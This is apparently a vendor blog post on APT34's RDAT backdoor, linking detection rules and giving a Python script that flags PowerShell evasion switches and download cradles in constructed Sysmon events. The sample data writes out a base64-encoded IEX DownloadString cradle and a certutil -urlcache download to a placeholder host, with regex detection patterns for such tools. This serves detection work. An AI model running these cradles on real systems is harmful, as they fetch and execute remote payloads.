Detection Content: RDAT Backdoor

Last week, researchers published details of attacks on Middle Eastern telecommunications organizations carried out by APT34 (aka OilRig and Helix Kitten), along with the updated tools in the group's arsenal. Participants in the Threat Bounty Program did not miss it and published a couple of rules for detecting the RDAT Backdoor; more on that below.

APT34 has been active since at least 2014. The group conducts reconnaissance aligned with the strategic interests of the Iranian government, operating primarily in the Middle East and targeting the financial, government, energy, chemical, telecommunications, and other industries. In 2020, the group ran several campaigns against government organizations in the United States, modifying tools from previous campaigns for this purpose.

The RDAT Backdoor is not a completely new tool either: APT34 already used early versions of it in 2017 and 2018. The new version of the malware adds a novel email-based C2 channel, used in combination with steganography to exfiltrate data. Adversaries can use it to issue commands, read the output, and send the results to the C&C server; it can also download and upload files over the selected C&C protocol.

Detection content to spot this threat:

OilRig’s “RDAT” Backdoor (Sysmon detection) by Ariel Millahuel: https://tdm.socprime.com/tdm/info/k6BRV4W38EJc/xcmAgHMBQAH5UgbBf-WN/?p=1

A variant of OILRIG (RDAT Backdoor) by Emir Erdogan: https://tdm.socprime.com/tdm/info/at9qZwhXJDef/VfGCgHMBPeJ4_8xcKk9B/?p=1

The rules have translations for the following platforms:

SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Graylog, Sumo Logic, ELK Stack, RSA NetWitness, Logpoint, Humio

EDR: Carbon Black, Elastic Endpoint

MITRE ATT&CK:

Tactics: Execution, Lateral Movement, Command and Control.

Techniques: Remote File Copy (T1105), PowerShell (T1086).
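As an added illustration of the two techniques these rules are mapped to (this is example code written for this post, not the TDM rules themselves, whose logic is only available via the links above), the following Python triages constructed Sysmon process-creation records: it flags PowerShell launched with hidden/encoded switches (T1086) and download-cradle command lines, including a cradle hidden inside an -EncodedCommand payload that has to be base64/UTF-16LE decoded before matching (T1105). The event lines, the field names, the decoded command and the example.invalid URLs are all constructed for the example and do not reproduce real RDAT telemetry.

```python
"""Toy Sysmon process-creation triage for the ATT&CK techniques listed above.

Added example, not the TDM rules themselves. All event records below are
constructed for illustration and do not reproduce real RDAT telemetry.
"""
import base64
import binascii
import re
from typing import Dict, List

# Known Sysmon field names we parse; values (e.g. CommandLine) may contain spaces,
# so we split only on whitespace that is followed by one of these keys.
FIELD_SPLIT = re.compile(r"\s+(?=(?:EventID|Image|ParentImage|CommandLine|DestinationPort)=)")

# T1086 (PowerShell): powershell launched with the usual evasion switches.
PS_IMAGE = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.I)
PS_SUSPICIOUS_ARGS = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\b|-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b", re.I
)

# T1105 (Remote File Copy): common LOLBin and PowerShell download cradles.
DOWNLOAD_CRADLE = re.compile(
    r"certutil(?:\.exe)?\s.*-urlcache|bitsadmin(?:\.exe)?\s.*/transfer|"
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer",
    re.I,
)

# Constructed: a download cradle encoded the way -EncodedCommand expects it
# (UTF-16LE, then base64). Built here so the decoder below can be checked against it.
CRADLE_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED_CRADLE = base64.b64encode(CRADLE_PLAINTEXT.encode("utf-16-le")).decode("ascii")

# Constructed Sysmon Event ID 1 records, flattened to key=value as a SIEM might show them.
SAMPLE_EVENTS = [
    "EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Windows\\System32\\svchost.exe "
    "CommandLine=powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED_CRADLE,
    "EventID=1 Image=C:\\Windows\\System32\\certutil.exe "
    "ParentImage=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=certutil.exe -urlcache -split -f http://example.invalid/update.bmp "
    "C:\\Users\\Public\\update.bmp",
    "EventID=1 Image=C:\\Windows\\System32\\notepad.exe "
    "ParentImage=C:\\Windows\\explorer.exe "
    "CommandLine=notepad.exe C:\\Users\\alice\\notes.txt",
    "EventID=3 Image=C:\\Program Files\\Browser\\browser.exe DestinationPort=443",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split a flattened key=value record into a dict, keeping spaces inside values."""
    fields: Dict[str, str] = {}
    for token in FIELD_SPLIT.split(line.strip()):
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def decode_encoded_command(cmd: str) -> str:
    """Return the UTF-16LE plaintext behind -EncodedCommand, or "" if absent or invalid."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return ""


def classify(event: Dict[str, str]) -> List[str]:
    """Map one process-creation event to the ATT&CK technique IDs it matches."""
    if event.get("EventID") != "1":          # only Sysmon process-creation events
        return []
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)    # look through the base64 layer too
    hits: List[str] = []
    if PS_IMAGE.search(image) and PS_SUSPICIOUS_ARGS.search(cmd):
        hits.append("T1086")
    if DOWNLOAD_CRADLE.search(cmd) or DOWNLOAD_CRADLE.search(decoded):
        hits.append("T1105")
    return hits


def triage(lines: List[str]) -> List[Dict[str, object]]:
    """Run classify() over raw records and keep only the ones that matched something."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        event = parse_event(line)
        techniques = classify(event)
        if techniques:
            findings.append({
                "image": event.get("Image", ""),
                "parent": event.get("ParentImage", ""),
                "techniques": techniques,
            })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["techniques"], finding["parent"], "->", finding["image"])
```

The point of the decoder is that a rule matching only the raw CommandLine would miss the first record: the cradle is invisible until the -EncodedCommand argument is base64-decoded and read as UTF-16LE, which is the encoding PowerShell expects there.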


Ready to try out SOC Prime TDM? Sign up for free. Or join the Threat Bounty Program to craft your own content and share it with the TDM community.